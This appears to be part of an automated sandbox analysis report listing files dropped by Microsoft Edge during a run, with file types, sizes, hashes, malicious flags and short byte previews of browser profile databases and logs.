                                                                                                                                                                                                            SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                                                                                            MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                                                                                            SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                                                                                            SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                                                                                            SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):334
                                                                                                                                                                                                            Entropy (8bit):5.157143823153651
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUaiGM+q2Pwkn23oH+Tcwt8a2jMGIFUt8YUaiScZZmw+YUaiSaMMVkwOwkn23oHr:qb+vYfYeb8EFUt8vScZ/+vSaNV5JfYek
                                                                                                                                                                                                            MD5:B96C6B5F5611F6B4DD57B8477CD5AB7B
                                                                                                                                                                                                            SHA1:262ED02D4BE61F01478A56548661B95C262FC692
                                                                                                                                                                                                            SHA-256:B15B55D65BFC53CCB895560E4A893E7798666091FF074C2B13DA023565E8657C
                                                                                                                                                                                                            SHA-512:C84101B5709E614CC3B2CE8788C22D04283728221B4C570BD3A1A3464684A9DD8D4B403DCD7065A0274F787805533B6460E793E62C7EF63CC76A0154000CD030
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:08.469 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/13-07:27:08.470 101c Recovering log #3.2024/11/13-07:27:08.472 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):334
                                                                                                                                                                                                            Entropy (8bit):5.157143823153651
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUaiGM+q2Pwkn23oH+Tcwt8a2jMGIFUt8YUaiScZZmw+YUaiSaMMVkwOwkn23oHr:qb+vYfYeb8EFUt8vScZ/+vSaNV5JfYek
                                                                                                                                                                                                            MD5:B96C6B5F5611F6B4DD57B8477CD5AB7B
                                                                                                                                                                                                            SHA1:262ED02D4BE61F01478A56548661B95C262FC692
                                                                                                                                                                                                            SHA-256:B15B55D65BFC53CCB895560E4A893E7798666091FF074C2B13DA023565E8657C
                                                                                                                                                                                                            SHA-512:C84101B5709E614CC3B2CE8788C22D04283728221B4C570BD3A1A3464684A9DD8D4B403DCD7065A0274F787805533B6460E793E62C7EF63CC76A0154000CD030
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:08.469 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/13-07:27:08.470 101c Recovering log #3.2024/11/13-07:27:08.472 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):57344
                                                                                                                                                                                                            Entropy (8bit):0.863060653641558
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                            MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                            SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                            SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                            SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                            Entropy (8bit):3.926136109079379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                            MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                            SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                            SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                            SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                            Entropy (8bit):0.555790634850688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                            MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                            SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                            SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                            SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203
                                                                                                                                                                                                            Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                            MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                            SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                            SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                            SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                            Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                            MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                            SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                            SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                            SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                            Entropy (8bit):2.874788585530478
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljl:S85aEFljljljljljljl
                                                                                                                                                                                                            MD5:6153AE3A389CFBA4B2FE34025943EC59
                                                                                                                                                                                                            SHA1:C5762DBAE34261A19EC867FFEA81551757373785
                                                                                                                                                                                                            SHA-256:93C2B2B9CE1D2A2F28FAC5AADC19C713B567DF08EAEEF4167B6543A1CD094A61
                                                                                                                                                                                                            SHA-512:F2367664799162966368C4A480DF6EB4205522EAAE32D861217BA8ED7CFABACBFBB0F7C66433FF6D31EC9638DA66E727E04C2239D7C6A0D5FD3356230E09AB6C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):322
                                                                                                                                                                                                            Entropy (8bit):5.12443403742065
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUahdqM+q2Pwkn23oH+TcwtrQMxIFUt8YUah/Zmw+YUahFVpMVkwOwkn23oH+TcM:r3+vYfYebCFUt82/+XV5JfYebtJ
                                                                                                                                                                                                            MD5:228A019043DC315CC37105CAE0B31689
                                                                                                                                                                                                            SHA1:E3824C4AD934C0616BA3EE3B1CE4777F24BDCC3C
                                                                                                                                                                                                            SHA-256:607E314BB2AE1C0FB27FA30260BD5164C06237D4523B575EE3E3FDCE1902CE44
                                                                                                                                                                                                            SHA-512:504933E846C422EBA3C345127A08D9D22BF48305D47A8749B660DE33CC8622A82EF37D36C63917D092185D0DB89C33CF87B877E62FD7518FB4680D4F399BCC2E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:09.296 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/13-07:27:09.298 101c Recovering log #3.2024/11/13-07:27:09.301 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):322
                                                                                                                                                                                                            Entropy (8bit):5.12443403742065
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUahdqM+q2Pwkn23oH+TcwtrQMxIFUt8YUah/Zmw+YUahFVpMVkwOwkn23oH+TcM:r3+vYfYebCFUt82/+XV5JfYebtJ
                                                                                                                                                                                                            MD5:228A019043DC315CC37105CAE0B31689
                                                                                                                                                                                                            SHA1:E3824C4AD934C0616BA3EE3B1CE4777F24BDCC3C
                                                                                                                                                                                                            SHA-256:607E314BB2AE1C0FB27FA30260BD5164C06237D4523B575EE3E3FDCE1902CE44
                                                                                                                                                                                                            SHA-512:504933E846C422EBA3C345127A08D9D22BF48305D47A8749B660DE33CC8622A82EF37D36C63917D092185D0DB89C33CF87B877E62FD7518FB4680D4F399BCC2E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:09.296 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/13-07:27:09.298 101c Recovering log #3.2024/11/13-07:27:09.301 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):296
                                                                                                                                                                                                            Entropy (8bit):4.182558187007475
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:3iUoMkDhqRFYSSa1W5yGIQU4f+gmUaFQlk1:3iUo1Dh2ya0aonlk1
                                                                                                                                                                                                            MD5:3E92E7A389B52ABAC24775A21293E7E3
                                                                                                                                                                                                            SHA1:78276FD09238B9338A50679F0C3F20B08803D2F1
                                                                                                                                                                                                            SHA-256:6C97907B013E3B3B5FF25E1B5D1867405DE17D84E7DDA677CE26D792C70BB7F1
                                                                                                                                                                                                            SHA-512:7EF9EF50810EEF4401A209C65F0E13AB83841BF34B6B481E8FEE32BF92C7A2CBA81E55BD1294D6ABABA5CAEF88953231758E364069649DE1EDBA2340688DD2C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SNSS.......<.&J...........<.&J......"<.&J...........<.&J.......<.&J.......=.&J.......=.&J....!..=.&J...............................<.&J=.&J1..,...=.&J$...abec723a_c3b7_4b61_a93b_0a8180dbd611...<.&J.......=.&J..............<.&J5..0...<.&J&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.....<.&J.......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):347
                                                                                                                                                                                                            Entropy (8bit):5.139659104787768
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavRYq2Pwkn23oH+Tcwt7Uh2ghZIFUt8YUavTgZmw+YUavTIkwOwkn23oH+TcwK:3SvYfYebIhHh2FUt8ITg/+ITI5JfYebs
                                                                                                                                                                                                            MD5:2F9EA1CADC11A7064B938813815D9596
                                                                                                                                                                                                            SHA1:2BF20E530CD6E77B4D008900754C155CA493307A
                                                                                                                                                                                                            SHA-256:6595F3CF159076B5A20A0D7C18F993AA6F0BAE3B93E9322B9A9A39FACB921264
                                                                                                                                                                                                            SHA-512:4CF1C2AC1863378B1D2E3A33251C7ECCE165387DCCEE22F388FB52908671382AA698CCD475FAF121E89A3CAC8595EB44A3FB3CB81343A3CD58D18D01D78ABA9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.402 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/13-07:27:07.690 d04 Recovering log #3.2024/11/13-07:27:07.690 d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):347
                                                                                                                                                                                                            Entropy (8bit):5.139659104787768
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavRYq2Pwkn23oH+Tcwt7Uh2ghZIFUt8YUavTgZmw+YUavTIkwOwkn23oH+TcwK:3SvYfYebIhHh2FUt8ITg/+ITI5JfYebs
                                                                                                                                                                                                            MD5:2F9EA1CADC11A7064B938813815D9596
                                                                                                                                                                                                            SHA1:2BF20E530CD6E77B4D008900754C155CA493307A
                                                                                                                                                                                                            SHA-256:6595F3CF159076B5A20A0D7C18F993AA6F0BAE3B93E9322B9A9A39FACB921264
                                                                                                                                                                                                            SHA-512:4CF1C2AC1863378B1D2E3A33251C7ECCE165387DCCEE22F388FB52908671382AA698CCD475FAF121E89A3CAC8595EB44A3FB3CB81343A3CD58D18D01D78ABA9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.402 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/13-07:27:07.690 d04 Recovering log #3.2024/11/13-07:27:07.690 d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                            Malicious:false
